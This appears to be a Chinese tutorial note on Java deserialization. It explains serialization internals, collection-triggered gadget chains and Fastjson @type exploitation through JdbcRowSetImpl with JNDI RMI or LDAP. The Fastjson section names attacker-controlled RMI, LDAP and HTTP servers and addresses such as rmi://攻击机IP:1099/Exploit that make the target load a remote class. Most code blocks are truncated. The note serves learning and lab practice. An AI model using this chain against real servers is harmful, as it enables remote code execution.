Java反序列化基础
概念
序列化和反序列化的区别
- 序列化:把Java对象转换为字节序列的过程
- 反序列化:把字节序列转化为Java对象的过程
出现点
- 功能特性
- 反序列化操作一般应用在导入模板文件、网络连通、数据传输、日志格式化存储、对象数据落磁盘或DB存储等业务场景,因此审计过程应重点关注这些功能模块
- 数据特性
- 一段数据以
rO0AB开头,基本可以确定是JAVA序列化base64加密的数据 - 以
aced开头,是java序列化数据的16进制
- 一段数据以
- 具体出现
- 网络通信:RMI、JMX、JMS、RPC框架(如Dubbo)或使用原生Java序列化协议的Socket通信。
- Web应用:通过HTTP请求参数、Cookie、Session(
HttpSession存储于文件或Redis)传入并反序列化用户可控的对象。 - 缓存与持久化:从文件系统或缓存(如Redis、Ehcache)读取序列化对象(
.ser文件或字节流)。 - 第三方组件:使用了存在不安全反序列化漏洞的第三方库(如Apache Commons Collections, Spring, Fastjson等)。
常见情况
- XML&SOAP
- XML 是一种常用的序列化和反序列化协议,具有跨机器,跨语言等优点,SOAP(SimpleObject Access protocol)是一种被广泛应用的,基于XML 为序列化和反序列化协议的结构化消息传递协议
- JSON
- Protobuf
利用
Ysoseria集成的jar配合生成、特性的专业漏洞利用工具等
序列化的实现
什么是序列化和反序列化
Java描述的是一个‘世界’,程序运行开始时,这个‘世界’也开始运作,但‘世界’中的对象不是一成不变的,它的属性会随着程序的运行而改变。
但很多情况下,我们需要保存某一刻某个对象的信息,来进行一些操作。比如利用反序列化将程序运行的对象状态以二进制形式储存与文件系统中,然后可以在另一个程序中对序列化后的对象状态数据进行反序列化恢复对象。可以有效地实现多平台之间的通信、对象持久化存储。
一个类的对象要想序列化成功,必须满足两个条件:
- 该类必须实现
java.io.Serializable接口。 - 该类的所有属性必须是可序列化的。如果有一个属性不是可序列化的,则该属性必须注明是短暂的。
识别
序列化的 Java 对象总是以固定的字节开头,这些字节在十六进制格式下被编码为 ac ed ,而在 Base64 格式下则被编码为 rO0 。
ObjectOutputStream
ObjectOutputStream 继承的父类或实现的接口如下:
- 父类 OutputStream:所有字节输出流的顶级父类,用来接收输出的字节并发送到某些接收器(sink)。
- 接口 ObjectOutput:ObjectOutput 扩展了 DataOutput 接口,DataOutput 接口提供了将数据从任何 Java 基本类型转换为字节序列并写入二进制流的功能,ObjectOutput 在 DataOutput 接口基础上提供了
writeObject方法,也就是类(Object)的写入。 - 接口 ObjectStreamConstants:定义了一些在对象序列化时写入的常量。常见的一些的比如
STREAM_MAGIC、STREAM_VERSION等。
通过这个类的父类及父接口,我们大概可以理解这个类提供的功能:能将 Java 中的类、数组、基本数据类型等对象转换为可输出的字节,也就是序列化。接下来看一下这个类中几个关键方法。
writeObject
这是 ObjectOutputStream 对象的核心方法之一,用来将一个对象写入输出流中,任何对象,包括字符串和数组,都是用 writeObject 写入到流中的。
之前说过,序列化的过程,就是将一个对象当前的状态描述为字节序列的过程,也就是 Object -> OutputStream 的过程,这个过程由 writeObject 实现。writeObject 方法负责为指定的类编写其对象的状态,以便在后面可以使用与之对应 readObject 方法来恢复它。
writeUnshared
用于将非共享对象写入 ObjectOutputStream,并将给定的对象作为刷新对象写入流中。
使用 writeUnshared 方法会使用 BlockDataOutputStream 的新实例进行序列化操作,不会使用原来 OutputStream 的引用对象。
writeObject0
writeObject 和 writeUnshared 实际上调用 writeObject0 方法,也就是说 writeObject0是上面两个方法的基础实现。具体的实现流程将会在后面再进行详细研究。
writeObjectOverride
如果 ObjectOutputStream 中的 enableOverride 属性为 true,writeObject 方法将会调用 writeObjectOverride,这个方法是由 ObjectOutputStream 的子类实现的。
在由完全重新实现 ObjectOutputStream 的子类完成序列化功能时,将会调用实现类的 writeObjectOverride 方法进行处理。
ObjectInputStream
ObjectInputStream 继承的父类或实现的接口如下:
- 父类 InputStream:所有字节输入流的顶级父类。
- 接口 ObjectInput:ObjectInput 扩展了 DataInput 接口,DataInput 接口提供了从二进制流读取字节并将其重新转换为 Java 基础类型的功能,ObjectInput 额外提供了
readObject方法用来读取类。 - 接口 ObjectStreamConstants:同上。
ObjectInputStream 实现了反序列化功能,看一下其中的关键方法。
readObject
从 ObjectInputStream 读取一个对象,将会读取对象的类、类的签名、类的非 transient 和非 static 字段的值,以及其所有父类类型。
我们可以使用 writeObject 和 readObject 方法为一个类重写默认的反序列化执行方,所以其中 readObject 方法会 “传递性” 的执行,也就是说,在反序列化过程中,会调用反序列化类的 readObject 方法,以完整的重新生成这个类的对象。
readUnshared
从 ObjectInputStream 读取一个非共享对象。 此方法与 readObject 类似,不同点在于readUnshared 不允许后续的 readObject 和 readUnshared 调用引用这次调用反序列化得到的对象。
readObject0
readObject 和 readUnshared 实际上调用 readObject0 方法,readObject0是上面两个方法的基础实现。
readObjectOverride
由 ObjectInputStream 子类调用,与 writeObjectOverride 一致。
通过上面对 ObjectOutputStream 和 ObjectInputStream 的了解,两个类的实现几乎是一种对称的、双生的方式进行。
集合和反序列化的关系
HashMap 和反序列化的关系
学习 Java 反序列化时,HashMap 很重要。
因为 HashMap 在存储和恢复数据时,经常会计算 key 的 hash 值。
计算 hash 值时,会调用 key 对象的:
1 | hashCode() |
如果发生 hash 冲突,还可能调用:
1 | equals() |
所以在反序列化中,经常关注:
1 | HashMap → key.hashCode() |
例如 URLDNS 链中,就利用了这个特点。
大致流程可以理解成:
1 | 反序列化 HashMap |
所以学习 HashMap 不是为了背所有方法,而是为了知道:
1 | HashMap 在某些情况下会自动调用 key 的 hashCode() 和 equals()。 |
TreeMap 和反序列化的关系
因为 TreeMap 需要排序,所以在插入数据或恢复数据时,可能会触发比较逻辑。
反序列化中需要关注:
1 | TreeMap → compare() |
看到 TreeMap,要想到:
1 | 它可能通过排序逻辑触发 compare() / compareTo()。 |
PriorityQueue 和反序列化的关系
PriorityQueue 是优先队列,内部需要维护元素的优先级顺序。
在插入元素、调整队列结构、反序列化恢复队列结构时,可能会触发比较逻辑。
比较逻辑通常来自:
compare()
compareTo()
所以在反序列化链中,PriorityQueue 经常被用来触发 Comparator.compare(),进而进入后续 gadget 链。
可以这样理解:
1 | 反序列化 PriorityQueue |
集合和反序列化总结
学习 Java 反序列化时,集合不是为了全背方法,而是为了理解哪些集合会自动触发哪些方法。
可以这样记:
1 | HashMap: |
反序列化视角下:
1 | HashMap / HashSet: |
常见框架
Fastjson
Fastjson 是阿里巴巴开源的 JSON 解析库,常见于 Java Web 应用中。它的作用是把 JSON 字符串转换成 Java 对象。
正常情况下:
1 | JSON 字符串 |
但 Fastjson 支持一个特殊字段:
1 | { |
@type 的作用是告诉 Fastjson:
1 | 请按照指定的 Java 类来创建对象 |
如果服务端允许用户控制 @type,攻击者就可以让 Fastjson 实例化一些危险类,从而触发这些类内部的危险方法。
所以 Fastjson 反序列化漏洞的核心不是传统的 ObjectInputStream,而是:
1 | 用户可控 JSON |
一句话:
Fastjson 漏洞本质是 不安全的类型解析 / 不安全对象实例化。
经典 JdbcRowSetImpl 链
常见 payload:
1 | { |
这里的关键类是:
1 | com.sun.rowset.JdbcRowSetImpl |
它原本是 Java 里和数据库连接相关的类。这个类中有一个属性:
1 | dataSourceName |
它可以接受一个 JNDI 地址,例如:
1 | rmi://攻击机IP:1099/Exploit |
当 Fastjson 解析 payload 时,大致流程是:
1 | Fastjson 看到 @type |
也就是说,Fastjson 本身没有直接执行命令,而是它创建的危险类触发了 JNDI。
RMI 利用流程
以 RMI 为例,完整链路如下:
1 | 攻击者构造 Fastjson payload |
图里所谓的 RMI 服务器,准确说是:
1 | 攻击者控制的 JNDI / RMI Reference Server |
它不是普通 Web 服务,而是负责返回一个 Reference 对象,告诉靶机:
1 | 你要加载的类在这里: |
所以实际利用时通常需要两个服务:
1 | 1099 端口:RMI 服务,返回 Reference |
为什么还需要 HTTP 服务
RMI 服务本身一般不直接提供 .class 文件,它只是告诉靶机去哪里下载 class。
完整关系:
1 | rmi://攻击机IP:1099/Exploit |
所以:
1 | RMI 服务:负责 JNDI lookup |
如果只启动 RMI,不启动 HTTP,经常会出现:
1 | RMI 有连接 |
这说明靶机拿到了 Reference,但没有成功下载 class。
LDAP 利用流程
LDAP 和 RMI 思路类似,只是协议换了。
1 | Fastjson payload |
常见地址:
1 | ldap://攻击机IP:1389/Exploit |
RMI 和 LDAP 的区别:
| 项目 | RMI | LDAP |
|---|---|---|
| 协议 | Java 远程方法调用 | 目录访问协议 |
| 常见端口 | 1099 | 389 / 1389 |
| 是否属于 JNDI | 是 | 是 |
| Fastjson 中的作用 | JNDI lookup 通道 | JNDI lookup 通道 |
一句话:
RMI 和 LDAP 不是一个东西,但都可以作为 JNDI lookup 的后端协议。
利用条件
Fastjson JNDI 利用通常需要满足几个条件:
1 | 1. 服务端使用存在风险的 Fastjson 版本 |
尤其要注意 JDK 版本。
很多靶场失败不是 payload 写错,而是:
1 | RMI / LDAP 访问成功 |
常见现象:
1 | RMI 服务有连接 |
